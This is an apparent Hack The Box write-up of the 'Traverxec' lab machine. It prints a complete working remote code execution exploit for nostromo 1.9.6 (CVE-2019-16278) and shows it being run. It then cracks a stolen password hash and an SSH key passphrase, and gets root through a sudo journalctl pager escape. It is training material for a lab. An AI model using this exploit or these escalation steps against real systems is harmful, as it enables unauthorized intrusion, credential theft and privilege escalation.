Traverxec

TL;DR

  • Find the webserver version and exploit CVE on Nostromo
  • Crack user’s hash and use directory transversal to retrieve private key
  • Abuse journalctl to get root

User.txt

Reconnaissance

Let’s start by a Nmap scan:

magnussen@funcMyLife:~/traverxec$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN traverxec.txt
Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-18 21:24 CET
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Initiating Ping Scan at 21:24
Scanning 10.10.10.165 [4 ports]
Completed Ping Scan at 21:24, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:24
Completed Parallel DNS resolution of 1 host. at 21:24, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:24
Scanning 10.10.10.165 [65535 ports]
Discovered open port 80/tcp on 10.10.10.165
Discovered open port 22/tcp on 10.10.10.165
Increasing send delay for 10.10.10.165 from 0 to 5 due to 11 out of 19 dropped probes since last increase.
Increasing send delay for 10.10.10.165 from 5 to 10 due to 11 out of 18 dropped probes since last increase.
Completed SYN Stealth Scan at 21:24, 39.50s elapsed (65535 total ports)
Initiating Service scan at 21:24
Scanning 2 services on 10.10.10.165
Completed Service scan at 21:24, 6.51s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.165.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 1.99s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Nmap scan report for 10.10.10.165
Host is up, received echo-reply ttl 63 (0.035s latency).
Scanned at 2020-02-18 21:24:00 CET for 49s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVWo6eEhBKO19Owd6sVIAFVCJjQqSL4g16oI/DoFwUo+ubJyyIeTRagQNE91YdCrENXF2qBs2yFj2fqfRZy9iqGB09VOZt6i8oalpbmFwkBDtCdHoIAZbaZFKAl+m1UBell2v0xUhAy37Wl9BjoUU3EQBVF5QJNQqvb/mSqHsi5TAJcMtCpWKA4So3pwZcTatSu5x/RYdKzzo9fWSS6hjO4/hdJ4BM6eyKQxa29vl/ea1PvcHPY5EDTRX5RtraV9HAT7w2zIZH5W6i3BQvMGEckrrvVTZ6Ge3Gjx00ORLBdoVyqQeXQzIJ/vuDuJOH2G6E/AHDsw3n5yFNMKeCvNNL
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLpsS/IDFr0gxOgk9GkAT0G4vhnRdtvoL8iem2q8yoRCatUIib1nkp5ViHvLEgL6e3AnzUJGFLI3TFz+CInilq4=
|   256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGJ16OMR0bxc/4SAEl1yiyEUxC3i/dFH7ftnCU7+P+3s
80/tcp open  http    syn-ack ttl 63 nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.85 seconds
           Raw packets sent: 196637 (8.652MB) | Rcvd: 22 (952B)

So we find 2 useful services:

  • OpenSSH (22)
  • Apache (80)

The website is a single page website about a developer.

If we generate an error, we find the webserver version.

magnussen@funcMyLife:~/traverxec$ curl traverxec.htb/test
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>404 Not Found</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
</head>
<body>

<h1>404 Not Found</h1>

<hr>
<address>nostromo 1.9.6 at traverxec.htb Port 80</address>
</body>
</html>

Nostromo RCE

We can check for CVE in Nostromo 1.9.6.

We find the following script on ExploitDB:

#!/usr/bin/env python
# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278

cve2019_16278.py

import sys
import socket

art = """

                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    



"""

help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'

def connect(soc):
    response = ""
    try:
        while True:
            connection = soc.recv(1024)
            if len(connection) == 0:
                break
            response += connection
    except:
        pass
    return response

def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload)
    receive = connect(soc)
    print(receive)

if __name__ == "__main__":

    print(art)

    try:
        target = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]

        cve(target, port, cmd)

    except IndexError:
        print(help_menu)

Let’s try it:

magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 id

                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    




HTTP/1.1 200 OK
Date: Tue, 18 Feb 2020 20:50:21 GMT
Server: nostromo 1.9.6
Connection: close


uid=33(www-data) gid=33(www-data) groups=33(www-data)

We now have a shell on the machine.

Crack user password and rsa passphrase

Let’s go deeper:

magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "ls -alh /var/"
drwxr-xr-x 12 root root  4.0K Oct 25 14:43 .
drwxr-xr-x 18 root root  4.0K Oct 25 14:17 ..
drwxr-xr-x  2 root root  4.0K Nov 12 06:25 backups
drwxr-xr-x  9 root root  4.0K Oct 25 14:34 cache
drwxr-xr-x 26 root root  4.0K Nov 12 04:56 lib
drwxrwsr-x  2 root staff 4.0K May 13  2019 local
lrwxrwxrwx  1 root root     9 Oct 25 14:15 lock -> /run/lock
drwxr-xr-x  5 root root  4.0K Feb 18 13:39 log
drwxrwsr-x  2 root mail  4.0K Oct 25 14:15 mail
drwxr-xr-x  6 root root  4.0K Oct 25 14:43 nostromo
drwxr-xr-x  2 root root  4.0K Oct 25 14:15 opt
lrwxrwxrwx  1 root root     4 Oct 25 14:15 run -> /run
drwxr-xr-x  4 root root  4.0K Oct 25 14:16 spool
drwxrwxrwt  3 root root  4.0K Feb 18 13:56 tmp
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "ls -alh /var/nostromo"
drwxr-xr-x  6 root     root   4.0K Oct 25 14:43 .
drwxr-xr-x 12 root     root   4.0K Oct 25 14:43 ..
drwxr-xr-x  2 root     daemon 4.0K Oct 27 16:12 conf
drwxr-xr-x  6 root     daemon 4.0K Oct 25 17:11 htdocs
drwxr-xr-x  2 root     daemon 4.0K Oct 25 14:43 icons
drwxr-xr-x  2 www-data daemon 4.0K Feb 18 15:11 logs
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "ls -alh /var/nostromo/conf"
drwxr-xr-x 2 root daemon 4.0K Oct 27 16:12 .
drwxr-xr-x 6 root root   4.0K Oct 25 14:43 ..
-rw-r--r-- 1 root bin      41 Oct 25 15:20 .htpasswd
-rw-r--r-- 1 root bin    2.9K Oct 25 14:26 mimes
-rw-r--r-- 1 root bin     498 Oct 25 15:20 nhttpd.conf
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "cat /var/nostromo/conf/.htpasswd"
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "cat /var/nostromo/conf/nhttpd.conf"
# MAIN [MANDATORY]
servername        traverxec.htb
serverlisten        *
serveradmin        david@traverxec.htb
serverroot        /var/nostromo
servermimes        conf/mimes
docroot            /var/nostromo/htdocs
docindex        index.html

# LOGS [OPTIONAL]
logpid            logs/nhttpd.pid

# SETUID [RECOMMENDED]
user            www-data

# BASIC AUTHENTICATION [OPTIONAL]
htaccess        .htaccess
htpasswd        /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]
/icons            /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs        /home
homedirs_public        public_www
magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "ls -alh /home/"
total 12K
drwxr-xr-x  3 root  root  4.0K Oct 25 14:32 .
drwxr-xr-x 18 root  root  4.0K Oct 25 14:17 ..
drwx--x--x  6 david david 4.0K Feb 18 15:24 david

Ok, so we find a hash, we can crack it with hashcat

magnussen@funcMyLife:~/traverxec$ hashcat -m 500 -a 0 --force 'david_hash.txt' 'rockyou.txt' --show
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me

As we saw in nhttpd.conf the home directory is /home and the public directory is public_www. We can list the files inside even if we can’t list the content of /home/david.

magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "ls -alh /home/david/public_www/"
drwxr-xr-x 3 david david 4.0K Oct 25 15:45 .
drwx--x--x 6 david david 4.0K Feb 18 15:24 ..
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4.0K Oct 25 17:02 protected-file-area
magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "ls -alh /home/david/public_www/protected-file-area"
drwxr-xr-x 2 david david 4.0K Oct 25 17:02 .
drwxr-xr-x 3 david david 4.0K Oct 25 15:45 ..
-rw-r--r-- 1 david david   45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 1.9K Oct 25 17:02 backup-ssh-identity-files.tgz

We can recover the archive with zcat:

magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "zcat /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz"

home/david/.ssh/0000700000175000017500000000000013554661372012712 5ustar  daviddavidhome/david/.ssh/authorized_keys0000644000175000017500000000061513554661372016062 0ustar  daviddavidssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec
home/david/.ssh/id_rsa0000600000175000017500000000334613554661335014105 0ustar  daviddavid
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F

seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W
KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU
RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7
HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc
Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec
dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN
6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO
xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1
Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6
i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T
fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA
bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so
uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I
Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s
9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U
rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua
4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU
/8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX
JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+
XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh
hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf
SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM
j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt
VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w
-----END RSA PRIVATE KEY-----

home/david/.ssh/id_rsa.pub0000644000175000017500000000061513554661364014700 0ustar  daviddavidssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec

It’s time to crack the private key’s passphrase with JohnTheRipper!

magnussen@funcMyLife:~/traverxec$ ./JohnTheRipper/run/ssh2john.py david_private_key.txt > crack_david.txt
magnussen@funcMyLife:~/traverxec$ ./JohnTheRipper/run/john --wordlist=rockyou.txt  crack_david.txt
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (david_private_key.txt)
1g 0:00:00:03 DONE (2020-02-18 22:07) 0.2710g/s 3886Kp/s 3886Kc/s 3886KC/s ¡Vamos!
Session completed

We have everything we need to connect to the server with SSH.

magnussen@funcMyLife:~/traverxec$ ssh -i david_private_key.txt david@traverxec.htb
david@traverxec:~$ id
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
david@traverxec:~$ ls -alh
total 44K
drwx--x--x 6 david david 4.0K Feb 18 15:24 .
drwxr-xr-x 3 root  root  4.0K Oct 25 14:32 ..
lrwxrwxrwx 1 root  root     9 Oct 25 16:15 .bash_history -> /dev/null
-rw-r--r-- 1 david david  220 Oct 25 14:32 .bash_logout
-rw-r--r-- 1 david david 3.5K Oct 25 14:32 .bashrc
-rw------- 1 david david  130 Feb 18 15:19 .lesshst
drwxr-xr-x 3 david david 4.0K Feb 18 15:24 .local
-rw-r--r-- 1 david david  807 Oct 25 14:32 .profile
drwx------ 2 david david 4.0K Oct 25 17:02 .ssh
drwx------ 2 david david 4.0K Feb 18 15:08 bin
drwxr-xr-x 3 david david 4.0K Oct 25 15:45 public_www
-r--r----- 1 root  david   33 Oct 25 16:14 user.txt
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d

I AM ROOT

Journalctl abuse

Let’s see how we can get root, let’s start by looking in the bin directory:

david@traverxec:~/bin$ ls -alh
total 20K
-rw-r--r-- 1 david david  621 Feb 18 15:08 -pager
drwx------ 2 david david 4.0K Feb 18 15:08 .
drwx--x--x 6 david david 4.0K Feb 18 15:24 ..
-r-------- 1 david david  802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david  363 Oct 25 16:26 server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

Alright, journalctl is run with sudo, we can exploit that and get a shell as root!

david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2020-02-18 14:25:14 EST, end at Tue 2020-02-18 16:12:25 EST. --
Feb 18 16:00:54 traverxec sudo[18362]: pam_unix(sudo:auth): authentication failure; logname
Feb 18 16:00:56 traverxec sudo[18362]: pam_unix(sudo:auth): conversation failed
Feb 18 16:00:56 traverxec sudo[18362]: pam_unix(sudo:auth): auth could not identify passwor
Feb 18 16:00:56 traverxec sudo[18362]: www-data : command not allowed ; TTY=pts/15 ; PWD=/t
Feb 18 16:00:57 traverxec crontab[18424]: (www-data) LIST (www-data)
!/bin/sh
# /bin/bash
root@traverxec:/home/david# id
uid=0(root) gid=0(root) groups=0(root)
root@traverxec:~# cat /root/root.txt
9aa36a6d76f785dfd320a478f6e0d906

This was a nice box, not very difficult, but a good way to start on Hack The Box.